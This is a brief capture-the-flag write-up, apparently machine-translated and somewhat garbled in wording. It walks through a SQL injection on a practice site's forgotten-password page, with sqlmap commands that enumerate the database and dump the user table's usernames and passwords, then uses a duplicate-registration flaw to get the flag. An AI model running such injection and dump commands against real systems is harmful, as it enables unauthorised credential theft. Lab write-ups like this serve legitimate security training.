A. Entering experiment
1. Follow the prompts to experiment, there are loopholes in the newly added industrial cloud management system login and registration page, to find out flag.
See the login and registration on the first try sql injection, manual test for a long time no use, and would like to see a sqlmap can not be filled:
python sqlmap.py -u "http://111.198.29.45:56964/login.php" --data "username=123&password=123" --dbs
There is no injection point, we guessed the topic and people can not be so easy for us to get the flag ,,,
Then I found that there are a forgotten password, it is little read:
Here looks like SQL injection, sqlmap and then run it.
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" --dbs
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 --tables 得到user表
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user --columns
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump
I did not get a registered account, and this should guess about the flag, the password should be md5 encrypted, decrypted tried did not succeed, but here it does not matter, where the use of
You can repeat the same user name registration loopholes, to register a new account, then log obtained flag.